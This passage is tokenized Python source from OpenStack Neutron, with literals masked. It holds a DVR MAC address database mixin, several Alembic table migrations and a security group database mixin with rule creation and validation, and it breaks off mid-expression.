begin ( subtransactions = True ) : <EOL> entry = ( context . session . query ( DistributedVirtualRouterMacAddress ) . <EOL> filter ( DistributedVirtualRouterMacAddress . host == host ) . <EOL> one ( ) ) <EOL> context . session . delete ( entry ) <EOL> except exc . NoResultFound : <EOL> return <EOL> dvr_macs = plugin . get_dvr_mac_address_list ( context ) <EOL> plugin . notifier . dvr_mac_address_update ( context , dvr_macs ) <EOL> class DVRDbMixin ( ext_dvr . DVRMacAddressPluginBase ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> registry . subscribe ( _delete_mac_associated_with_agent , <EOL> resources . AGENT , events . BEFORE_DELETE ) <EOL> return super ( DVRDbMixin , cls ) . __new__ ( cls ) <EOL> @ property <EOL> def plugin ( self ) : <EOL> try : <EOL> if self . _plugin is not None : <EOL> return self . _plugin <EOL> except AttributeError : <EOL> pass <EOL> self . _plugin = manager . NeutronManager . get_plugin ( ) <EOL> return self . _plugin <EOL> def _get_dvr_mac_address_by_host ( self , context , host ) : <EOL> try : <EOL> query = context . session . query ( DistributedVirtualRouterMacAddress ) <EOL> dvrma = query . filter ( <EOL> DistributedVirtualRouterMacAddress . host == host ) . one ( ) <EOL> except exc . NoResultFound : <EOL> raise ext_dvr . DVRMacAddressNotFound ( host = host ) <EOL> return dvrma <EOL> def _create_dvr_mac_address ( self , context , host ) : <EOL> """<STR_LIT>""" <EOL> base_mac = cfg . CONF . dvr_base_mac . split ( '<STR_LIT::>' ) <EOL> max_retries = cfg . CONF . mac_generation_retries <EOL> for attempt in reversed ( range ( max_retries ) ) : <EOL> try : <EOL> with context . session . begin ( subtransactions = True ) : <EOL> mac_address = utils . get_random_mac ( base_mac ) <EOL> dvr_mac_binding = DistributedVirtualRouterMacAddress ( <EOL> host = host , mac_address = mac_address ) <EOL> context . session . add ( dvr_mac_binding ) <EOL> LOG . 
debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT:host>' : host , '<STR_LIT>' : mac_address } ) <EOL> dvr_macs = self . get_dvr_mac_address_list ( context ) <EOL> self . notifier . dvr_mac_address_update ( context , dvr_macs ) <EOL> return self . _make_dvr_mac_address_dict ( dvr_mac_binding ) <EOL> except db_exc . DBDuplicateEntry : <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT>' : mac_address , '<STR_LIT>' : attempt } ) <EOL> LOG . error ( _LE ( "<STR_LIT>" ) , max_retries ) <EOL> raise ext_dvr . MacAddressGenerationFailure ( host = host ) <EOL> def get_dvr_mac_address_list ( self , context ) : <EOL> with context . session . begin ( subtransactions = True ) : <EOL> return ( context . session . <EOL> query ( DistributedVirtualRouterMacAddress ) . all ( ) ) <EOL> def get_dvr_mac_address_by_host ( self , context , host ) : <EOL> """<STR_LIT>""" <EOL> if not host : <EOL> return <EOL> try : <EOL> return self . _get_dvr_mac_address_by_host ( context , host ) <EOL> except ext_dvr . DVRMacAddressNotFound : <EOL> return self . _create_dvr_mac_address ( context , host ) <EOL> def _make_dvr_mac_address_dict ( self , dvr_mac_entry , fields = None ) : <EOL> return { '<STR_LIT:host>' : dvr_mac_entry [ '<STR_LIT:host>' ] , <EOL> '<STR_LIT>' : dvr_mac_entry [ '<STR_LIT>' ] } <EOL> @ log_helpers . log_method_call <EOL> def get_ports_on_host_by_subnet ( self , context , host , subnet ) : <EOL> """<STR_LIT>""" <EOL> filters = { '<STR_LIT>' : { '<STR_LIT>' : [ subnet ] } , <EOL> portbindings . HOST_ID : [ host ] } <EOL> ports_query = self . plugin . _get_ports_query ( context , filters = filters ) <EOL> owner_filter = or_ ( <EOL> models_v2 . Port . device_owner . startswith ( <EOL> constants . DEVICE_OWNER_COMPUTE_PREFIX ) , <EOL> models_v2 . Port . device_owner . in_ ( <EOL> utils . get_other_dvr_serviced_device_owners ( ) ) ) <EOL> ports_query = ports_query . filter ( owner_filter ) <EOL> ports = [ <EOL> self . plugin . 
_make_port_dict ( port , process_extensions = False ) <EOL> for port in ports_query . all ( ) <EOL> ] <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT:host>' : host , '<STR_LIT>' : subnet , <EOL> '<STR_LIT>' : ports } ) <EOL> return ports <EOL> @ log_helpers . log_method_call <EOL> def get_subnet_for_dvr ( self , context , subnet , fixed_ips = None ) : <EOL> if fixed_ips : <EOL> subnet_data = fixed_ips [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> else : <EOL> subnet_data = subnet <EOL> try : <EOL> subnet_info = self . plugin . get_subnet ( <EOL> context , subnet_data ) <EOL> except n_exc . SubnetNotFound : <EOL> return { } <EOL> else : <EOL> if fixed_ips : <EOL> ip_address = fixed_ips [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> else : <EOL> ip_address = subnet_info [ '<STR_LIT>' ] <EOL> filter = { '<STR_LIT>' : { '<STR_LIT>' : [ subnet ] , <EOL> '<STR_LIT>' : [ ip_address ] } } <EOL> internal_gateway_ports = self . plugin . get_ports ( <EOL> context , filters = filter ) <EOL> if not internal_gateway_ports : <EOL> LOG . error ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , subnet_info ) <EOL> return { } <EOL> internal_port = internal_gateway_ports [ <NUM_LIT:0> ] <EOL> subnet_info [ '<STR_LIT>' ] = internal_port [ '<STR_LIT>' ] <EOL> return subnet_info </s>
<s> from alembic import op <EOL> import sqlalchemy as sa <EOL> action_types = sa . Enum ( '<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) <EOL> def upgrade ( ) : <EOL> op . create_table ( <EOL> '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:id>' , sa . String ( length = <NUM_LIT> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:description>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:id>' ) ) <EOL> op . create_table ( <EOL> '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:id>' , sa . String ( length = <NUM_LIT> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:description>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:status>' , sa . String ( length = <NUM_LIT:16> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , <EOL> name = '<STR_LIT>' ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:id>' ) ) <EOL> op . create_table ( <EOL> '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:id>' , sa . String ( length = <NUM_LIT> ) , nullable = False ) , <EOL> sa . 
Column ( '<STR_LIT:name>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:description>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT> ) , <EOL> nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:action>' , action_types , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' ] , <EOL> name = '<STR_LIT>' ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:id>' ) ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> from sqlalchemy import sql <EOL> def upgrade ( ) : <EOL> op . create_table ( <EOL> '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , <EOL> nullable = False , primary_key = True , index = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , <EOL> nullable = False , primary_key = True , index = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False , <EOL> server_default = sql . false ( ) ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False , <EOL> server_default = '<STR_LIT:0>' ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False , <EOL> server_default = '<STR_LIT:0>' ) ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . add_column ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) ) ) </s>
<s> import netaddr <EOL> from neutron_lib . api import validators <EOL> from neutron_lib import constants <EOL> from oslo_db import exception as db_exc <EOL> from oslo_log import log as logging <EOL> from oslo_utils import uuidutils <EOL> import sqlalchemy as sa <EOL> from sqlalchemy import orm <EOL> from sqlalchemy . orm import exc <EOL> from sqlalchemy . orm import scoped_session <EOL> from neutron . _i18n import _ <EOL> from neutron . api . v2 import attributes <EOL> from neutron . callbacks import events <EOL> from neutron . callbacks import exceptions <EOL> from neutron . callbacks import registry <EOL> from neutron . callbacks import resources <EOL> from neutron . common import constants as n_const <EOL> from neutron . common import utils <EOL> from neutron . db import api as db_api <EOL> from neutron . db import db_base_plugin_v2 <EOL> from neutron . db import model_base <EOL> from neutron . db import models_v2 <EOL> from neutron . extensions import securitygroup as ext_sg <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class SecurityGroup ( model_base . HasStandardAttributes , model_base . BASEV2 , <EOL> model_base . HasId , model_base . HasTenant ) : <EOL> """<STR_LIT>""" <EOL> name = sa . Column ( sa . String ( attributes . NAME_MAX_LEN ) ) <EOL> class DefaultSecurityGroup ( model_base . BASEV2 ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> tenant_id = sa . Column ( sa . String ( attributes . TENANT_ID_MAX_LEN ) , <EOL> primary_key = True , nullable = False ) <EOL> security_group_id = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> sa . ForeignKey ( "<STR_LIT>" , <EOL> ondelete = "<STR_LIT>" ) , <EOL> nullable = False ) <EOL> security_group = orm . relationship ( <EOL> SecurityGroup , lazy = '<STR_LIT>' , <EOL> backref = orm . backref ( '<STR_LIT>' , cascade = '<STR_LIT>' ) , <EOL> primaryjoin = "<STR_LIT>" , <EOL> ) <EOL> class SecurityGroupPortBinding ( model_base . BASEV2 ) : <EOL> """<STR_LIT>""" <EOL> port_id = sa . Column ( sa . 
String ( <NUM_LIT> ) , <EOL> sa . ForeignKey ( "<STR_LIT>" , <EOL> ondelete = '<STR_LIT>' ) , <EOL> primary_key = True ) <EOL> security_group_id = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> sa . ForeignKey ( "<STR_LIT>" ) , <EOL> primary_key = True ) <EOL> ports = orm . relationship ( <EOL> models_v2 . Port , <EOL> backref = orm . backref ( "<STR_LIT>" , <EOL> lazy = '<STR_LIT>' , cascade = '<STR_LIT>' ) ) <EOL> class SecurityGroupRule ( model_base . HasStandardAttributes , model_base . BASEV2 , <EOL> model_base . HasId , model_base . HasTenant ) : <EOL> """<STR_LIT>""" <EOL> security_group_id = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> sa . ForeignKey ( "<STR_LIT>" , <EOL> ondelete = "<STR_LIT>" ) , <EOL> nullable = False ) <EOL> remote_group_id = sa . Column ( sa . String ( <NUM_LIT> ) , <EOL> sa . ForeignKey ( "<STR_LIT>" , <EOL> ondelete = "<STR_LIT>" ) , <EOL> nullable = True ) <EOL> direction = sa . Column ( sa . Enum ( '<STR_LIT>' , '<STR_LIT>' , <EOL> name = '<STR_LIT>' ) ) <EOL> ethertype = sa . Column ( sa . String ( <NUM_LIT> ) ) <EOL> protocol = sa . Column ( sa . String ( <NUM_LIT> ) ) <EOL> port_range_min = sa . Column ( sa . Integer ) <EOL> port_range_max = sa . Column ( sa . Integer ) <EOL> remote_ip_prefix = sa . Column ( sa . String ( <NUM_LIT:255> ) ) <EOL> security_group = orm . relationship ( <EOL> SecurityGroup , <EOL> backref = orm . backref ( '<STR_LIT>' , cascade = '<STR_LIT>' , lazy = '<STR_LIT>' ) , <EOL> primaryjoin = "<STR_LIT>" ) <EOL> source_group = orm . relationship ( <EOL> SecurityGroup , <EOL> backref = orm . backref ( '<STR_LIT>' , cascade = '<STR_LIT>' ) , <EOL> primaryjoin = "<STR_LIT>" ) <EOL> class SecurityGroupDbMixin ( ext_sg . SecurityGroupPluginBase ) : <EOL> """<STR_LIT>""" <EOL> __native_bulk_support = True <EOL> def create_security_group_bulk ( self , context , security_group_rule ) : <EOL> return self . 
_create_bulk ( '<STR_LIT>' , context , <EOL> security_group_rule ) <EOL> def _registry_notify ( self , res , event , id = None , exc_cls = None , ** kwargs ) : <EOL> try : <EOL> registry . notify ( res , event , self , ** kwargs ) <EOL> except exceptions . CallbackFailure as e : <EOL> if exc_cls : <EOL> reason = ( _ ( '<STR_LIT>' ) % <EOL> { '<STR_LIT>' : event , '<STR_LIT>' : e } ) <EOL> raise exc_cls ( reason = reason , id = id ) <EOL> def create_security_group ( self , context , security_group , default_sg = False ) : <EOL> """<STR_LIT>""" <EOL> s = security_group [ '<STR_LIT>' ] <EOL> kwargs = { <EOL> '<STR_LIT>' : context , <EOL> '<STR_LIT>' : s , <EOL> '<STR_LIT>' : default_sg , <EOL> } <EOL> self . _registry_notify ( resources . SECURITY_GROUP , events . BEFORE_CREATE , <EOL> exc_cls = ext_sg . SecurityGroupConflict , ** kwargs ) <EOL> tenant_id = s [ '<STR_LIT>' ] <EOL> if not default_sg : <EOL> self . _ensure_default_security_group ( context , tenant_id ) <EOL> with db_api . autonested_transaction ( context . session ) : <EOL> security_group_db = SecurityGroup ( id = s . get ( '<STR_LIT:id>' ) or ( <EOL> uuidutils . generate_uuid ( ) ) , <EOL> description = s [ '<STR_LIT:description>' ] , <EOL> tenant_id = tenant_id , <EOL> name = s [ '<STR_LIT:name>' ] ) <EOL> context . session . add ( security_group_db ) <EOL> if default_sg : <EOL> context . session . add ( DefaultSecurityGroup ( <EOL> security_group = security_group_db , <EOL> tenant_id = security_group_db [ '<STR_LIT>' ] ) ) <EOL> for ethertype in ext_sg . sg_supported_ethertypes : <EOL> if default_sg : <EOL> ingress_rule = SecurityGroupRule ( <EOL> id = uuidutils . generate_uuid ( ) , tenant_id = tenant_id , <EOL> security_group = security_group_db , <EOL> direction = '<STR_LIT>' , <EOL> ethertype = ethertype , <EOL> source_group = security_group_db ) <EOL> context . session . add ( ingress_rule ) <EOL> egress_rule = SecurityGroupRule ( <EOL> id = uuidutils . 
generate_uuid ( ) , tenant_id = tenant_id , <EOL> security_group = security_group_db , <EOL> direction = '<STR_LIT>' , <EOL> ethertype = ethertype ) <EOL> context . session . add ( egress_rule ) <EOL> self . _registry_notify ( resources . SECURITY_GROUP , <EOL> events . PRECOMMIT_CREATE , <EOL> exc_cls = ext_sg . SecurityGroupConflict , <EOL> ** kwargs ) <EOL> secgroup_dict = self . _make_security_group_dict ( security_group_db ) <EOL> kwargs [ '<STR_LIT>' ] = secgroup_dict <EOL> registry . notify ( resources . SECURITY_GROUP , events . AFTER_CREATE , self , <EOL> ** kwargs ) <EOL> return secgroup_dict <EOL> def get_security_groups ( self , context , filters = None , fields = None , <EOL> sorts = None , limit = None , <EOL> marker = None , page_reverse = False , default_sg = False ) : <EOL> if not default_sg and context . tenant_id : <EOL> tenant_id = filters . get ( '<STR_LIT>' ) <EOL> if tenant_id : <EOL> tenant_id = tenant_id [ <NUM_LIT:0> ] <EOL> else : <EOL> tenant_id = context . tenant_id <EOL> self . _ensure_default_security_group ( context , tenant_id ) <EOL> marker_obj = self . _get_marker_obj ( context , '<STR_LIT>' , limit , <EOL> marker ) <EOL> return self . _get_collection ( context , <EOL> SecurityGroup , <EOL> self . _make_security_group_dict , <EOL> filters = filters , fields = fields , <EOL> sorts = sorts , <EOL> limit = limit , marker_obj = marker_obj , <EOL> page_reverse = page_reverse ) <EOL> def get_security_groups_count ( self , context , filters = None ) : <EOL> return self . _get_collection_count ( context , SecurityGroup , <EOL> filters = filters ) <EOL> def get_security_group ( self , context , id , fields = None , tenant_id = None ) : <EOL> """<STR_LIT>""" <EOL> if tenant_id : <EOL> tmp_context_tenant_id = context . tenant_id <EOL> context . tenant_id = tenant_id <EOL> try : <EOL> with context . session . begin ( subtransactions = True ) : <EOL> ret = self . _make_security_group_dict ( self . 
_get_security_group ( <EOL> context , id ) , fields ) <EOL> ret [ '<STR_LIT>' ] = self . get_security_group_rules ( <EOL> context , { '<STR_LIT>' : [ id ] } ) <EOL> finally : <EOL> if tenant_id : <EOL> context . tenant_id = tmp_context_tenant_id <EOL> return ret <EOL> def _get_security_group ( self , context , id ) : <EOL> try : <EOL> query = self . _model_query ( context , SecurityGroup ) <EOL> sg = query . filter ( SecurityGroup . id == id ) . one ( ) <EOL> except exc . NoResultFound : <EOL> raise ext_sg . SecurityGroupNotFound ( id = id ) <EOL> return sg <EOL> def delete_security_group ( self , context , id ) : <EOL> filters = { '<STR_LIT>' : [ id ] } <EOL> ports = self . _get_port_security_group_bindings ( context , filters ) <EOL> if ports : <EOL> raise ext_sg . SecurityGroupInUse ( id = id ) <EOL> sg = self . _get_security_group ( context , id ) <EOL> if sg [ '<STR_LIT:name>' ] == '<STR_LIT:default>' and not context . is_admin : <EOL> raise ext_sg . SecurityGroupCannotRemoveDefault ( ) <EOL> kwargs = { <EOL> '<STR_LIT>' : context , <EOL> '<STR_LIT>' : id , <EOL> '<STR_LIT>' : sg , <EOL> } <EOL> self . _registry_notify ( resources . SECURITY_GROUP , events . BEFORE_DELETE , <EOL> exc_cls = ext_sg . SecurityGroupInUse , id = id , <EOL> ** kwargs ) <EOL> with context . session . begin ( subtransactions = True ) : <EOL> self . _registry_notify ( resources . SECURITY_GROUP , <EOL> events . PRECOMMIT_DELETE , <EOL> exc_cls = ext_sg . SecurityGroupInUse , id = id , <EOL> ** kwargs ) <EOL> context . session . delete ( sg ) <EOL> kwargs . pop ( '<STR_LIT>' ) <EOL> registry . notify ( resources . SECURITY_GROUP , events . AFTER_DELETE , self , <EOL> ** kwargs ) <EOL> def update_security_group ( self , context , id , security_group ) : <EOL> s = security_group [ '<STR_LIT>' ] <EOL> kwargs = { <EOL> '<STR_LIT>' : context , <EOL> '<STR_LIT>' : id , <EOL> '<STR_LIT>' : s , <EOL> } <EOL> self . _registry_notify ( resources . SECURITY_GROUP , events . 
BEFORE_UPDATE , <EOL> exc_cls = ext_sg . SecurityGroupConflict , ** kwargs ) <EOL> with context . session . begin ( subtransactions = True ) : <EOL> sg = self . _get_security_group ( context , id ) <EOL> if sg [ '<STR_LIT:name>' ] == '<STR_LIT:default>' and '<STR_LIT:name>' in s : <EOL> raise ext_sg . SecurityGroupCannotUpdateDefault ( ) <EOL> self . _registry_notify ( <EOL> resources . SECURITY_GROUP , <EOL> events . PRECOMMIT_UPDATE , <EOL> exc_cls = ext_sg . SecurityGroupConflict , ** kwargs ) <EOL> sg . update ( s ) <EOL> sg_dict = self . _make_security_group_dict ( sg ) <EOL> kwargs [ '<STR_LIT>' ] = sg_dict <EOL> registry . notify ( resources . SECURITY_GROUP , events . AFTER_UPDATE , self , <EOL> ** kwargs ) <EOL> return sg_dict <EOL> def _make_security_group_dict ( self , security_group , fields = None ) : <EOL> res = { '<STR_LIT:id>' : security_group [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT:name>' : security_group [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' : security_group [ '<STR_LIT>' ] , <EOL> '<STR_LIT:description>' : security_group [ '<STR_LIT:description>' ] } <EOL> res [ '<STR_LIT>' ] = [ self . _make_security_group_rule_dict ( r ) <EOL> for r in security_group . rules ] <EOL> self . _apply_dict_extend_functions ( ext_sg . SECURITYGROUPS , res , <EOL> security_group ) <EOL> return self . _fields ( res , fields ) <EOL> def _make_security_group_binding_dict ( self , security_group , fields = None ) : <EOL> res = { '<STR_LIT>' : security_group [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : security_group [ '<STR_LIT>' ] } <EOL> return self . _fields ( res , fields ) <EOL> def _create_port_security_group_binding ( self , context , port_id , <EOL> security_group_id ) : <EOL> with context . session . begin ( subtransactions = True ) : <EOL> db = SecurityGroupPortBinding ( port_id = port_id , <EOL> security_group_id = security_group_id ) <EOL> context . session . 
add ( db ) <EOL> def _get_port_security_group_bindings ( self , context , <EOL> filters = None , fields = None ) : <EOL> return self . _get_collection ( context , <EOL> SecurityGroupPortBinding , <EOL> self . _make_security_group_binding_dict , <EOL> filters = filters , fields = fields ) <EOL> def _delete_port_security_group_bindings ( self , context , port_id ) : <EOL> query = self . _model_query ( context , SecurityGroupPortBinding ) <EOL> bindings = query . filter ( <EOL> SecurityGroupPortBinding . port_id == port_id ) <EOL> with context . session . begin ( subtransactions = True ) : <EOL> for binding in bindings : <EOL> context . session . delete ( binding ) <EOL> def create_security_group_rule_bulk ( self , context , security_group_rules ) : <EOL> return self . _create_bulk ( '<STR_LIT>' , context , <EOL> security_group_rules ) <EOL> def create_security_group_rule_bulk_native ( self , context , <EOL> security_group_rules ) : <EOL> rules = security_group_rules [ '<STR_LIT>' ] <EOL> scoped_session ( context . session ) <EOL> security_group_id = self . _validate_security_group_rules ( <EOL> context , security_group_rules ) <EOL> with context . session . begin ( subtransactions = True ) : <EOL> if not self . get_security_group ( context , security_group_id ) : <EOL> raise ext_sg . SecurityGroupNotFound ( id = security_group_id ) <EOL> self . _check_for_duplicate_rules ( context , rules ) <EOL> ret = [ ] <EOL> for rule_dict in rules : <EOL> res_rule_dict = self . _create_security_group_rule ( <EOL> context , rule_dict , validate = False ) <EOL> ret . append ( res_rule_dict ) <EOL> return ret <EOL> def create_security_group_rule ( self , context , security_group_rule ) : <EOL> return self . _create_security_group_rule ( context , security_group_rule ) <EOL> def _create_security_group_rule ( self , context , security_group_rule , <EOL> validate = True ) : <EOL> if validate : <EOL> self . _validate_security_group_rule ( context , security_group_rule ) <EOL> self . 
_check_for_duplicate_rules_in_db ( context , security_group_rule ) <EOL> rule_dict = security_group_rule [ '<STR_LIT>' ] <EOL> kwargs = { <EOL> '<STR_LIT>' : context , <EOL> '<STR_LIT>' : rule_dict <EOL> } <EOL> self . _registry_notify ( resources . SECURITY_GROUP_RULE , <EOL> events . BEFORE_CREATE , <EOL> exc_cls = ext_sg . SecurityGroupConflict , ** kwargs ) <EOL> with context . session . begin ( subtransactions = True ) : <EOL> db = SecurityGroupRule ( <EOL> id = ( rule_dict . get ( '<STR_LIT:id>' ) or uuidutils . generate_uuid ( ) ) , <EOL> tenant_id = rule_dict [ '<STR_LIT>' ] , <EOL> security_group_id = rule_dict [ '<STR_LIT>' ] , <EOL> direction = rule_dict [ '<STR_LIT>' ] , <EOL> remote_group_id = rule_dict . get ( '<STR_LIT>' ) , <EOL> ethertype = rule_dict [ '<STR_LIT>' ] , <EOL> protocol = rule_dict [ '<STR_LIT>' ] , <EOL> port_range_min = rule_dict [ '<STR_LIT>' ] , <EOL> port_range_max = rule_dict [ '<STR_LIT>' ] , <EOL> remote_ip_prefix = rule_dict . get ( '<STR_LIT>' ) , <EOL> description = rule_dict . get ( '<STR_LIT:description>' ) <EOL> ) <EOL> context . session . add ( db ) <EOL> self . _registry_notify ( resources . SECURITY_GROUP_RULE , <EOL> events . PRECOMMIT_CREATE , <EOL> exc_cls = ext_sg . SecurityGroupConflict , ** kwargs ) <EOL> res_rule_dict = self . _make_security_group_rule_dict ( db ) <EOL> kwargs [ '<STR_LIT>' ] = res_rule_dict <EOL> registry . notify ( <EOL> resources . SECURITY_GROUP_RULE , events . AFTER_CREATE , self , <EOL> ** kwargs ) <EOL> return res_rule_dict <EOL> def _get_ip_proto_number ( self , protocol ) : <EOL> if protocol is None : <EOL> return <EOL> if protocol in n_const . IP_PROTOCOL_NAME_ALIASES : <EOL> protocol = n_const . IP_PROTOCOL_NAME_ALIASES [ protocol ] <EOL> return int ( constants . IP_PROTOCOL_MAP . get ( protocol , protocol ) ) <EOL> def _get_ip_proto_name_and_num ( self , protocol ) : <EOL> if protocol is None : <EOL> return <EOL> protocol = str ( protocol ) <EOL> if protocol in constants . 
IP_PROTOCOL_MAP : <EOL> return [ protocol , str ( constants . IP_PROTOCOL_MAP . get ( protocol ) ) ] <EOL> elif protocol in n_const . IP_PROTOCOL_NUM_TO_NAME_MAP : <EOL> return [ n_const . IP_PROTOCOL_NUM_TO_NAME_MAP . get ( protocol ) , <EOL> protocol ] <EOL> return [ protocol , protocol ] <EOL> def _validate_port_range ( self , rule ) : <EOL> """<STR_LIT>""" <EOL> if ( rule [ '<STR_LIT>' ] is None and <EOL> rule [ '<STR_LIT>' ] is None ) : <EOL> return <EOL> if not rule [ '<STR_LIT>' ] : <EOL> raise ext_sg . SecurityGroupProtocolRequiredWithPorts ( ) <EOL> ip_proto = self . _get_ip_proto_number ( rule [ '<STR_LIT>' ] ) <EOL> if ip_proto in [ constants . PROTO_NUM_TCP , constants . PROTO_NUM_UDP ] : <EOL> if rule [ '<STR_LIT>' ] == <NUM_LIT:0> or rule [ '<STR_LIT>' ] == <NUM_LIT:0> : <EOL> raise ext_sg . SecurityGroupInvalidPortValue ( port = <NUM_LIT:0> ) <EOL> elif ( rule [ '<STR_LIT>' ] is not None and <EOL> rule [ '<STR_LIT>' ] is not None and <EOL> rule [ '<STR_LIT>' ] <= rule [ '<STR_LIT>' ] ) : <EOL> pass <EOL> else : <EOL> raise ext_sg . SecurityGroupInvalidPortRange ( ) <EOL> elif ip_proto == constants . PROTO_NUM_ICMP : <EOL> for attr , field in [ ( '<STR_LIT>' , '<STR_LIT:type>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:code>' ) ] : <EOL> if rule [ attr ] is not None and not ( <NUM_LIT:0> <= rule [ attr ] <= <NUM_LIT:255> ) : <EOL> raise ext_sg . SecurityGroupInvalidIcmpValue ( <EOL> field = field , attr = attr , value = rule [ attr ] ) <EOL> if ( rule [ '<STR_LIT>' ] is None and <EOL> rule [ '<STR_LIT>' ] is not None ) : <EOL> raise ext_sg . SecurityGroupMissingIcmpType ( <EOL> value = rule [ '<STR_LIT>' ] ) <EOL> def _validate_ethertype_and_protocol ( self , rule ) : <EOL> """<STR_LIT>""" <EOL> if rule [ '<STR_LIT>' ] in [ constants . PROTO_NAME_IPV6_ENCAP , <EOL> constants . PROTO_NAME_IPV6_FRAG , <EOL> constants . PROTO_NAME_IPV6_ICMP , <EOL> n_const . PROTO_NAME_IPV6_ICMP_LEGACY , <EOL> constants . PROTO_NAME_IPV6_NONXT , <EOL> constants . 
PROTO_NAME_IPV6_OPTS , <EOL> constants . PROTO_NAME_IPV6_ROUTE ] : <EOL> if rule [ '<STR_LIT>' ] == constants . IPv4 : <EOL> raise ext_sg . SecurityGroupEthertypeConflictWithProtocol ( <EOL> ethertype = rule [ '<STR_LIT>' ] , protocol = rule [ '<STR_LIT>' ] ) <EOL> def _validate_single_tenant_and_group ( self , security_group_rules ) : <EOL> """<STR_LIT>""" <EOL> sg_groups = set ( ) <EOL> tenants = set ( ) <EOL> for rule_dict in security_group_rules [ '<STR_LIT>' ] : <EOL> rule = rule_dict [ '<STR_LIT>' ] <EOL> sg_groups . add ( rule [ '<STR_LIT>' ] ) <EOL> if len ( sg_groups ) > <NUM_LIT:1> : <EOL> raise ext_sg . SecurityGroupNotSingleGroupRules ( ) <EOL> tenants . add ( rule [ '<STR_LIT>' ] ) <EOL> if len ( tenants ) > <NUM_LIT:1> : <EOL> raise ext_sg . SecurityGroupRulesNotSingleTenant ( ) <EOL> return sg_groups . pop ( ) <EOL> def _validate_security_group_rule ( self , context , security_group_rule ) : <EOL> rule = security_group_rule [ 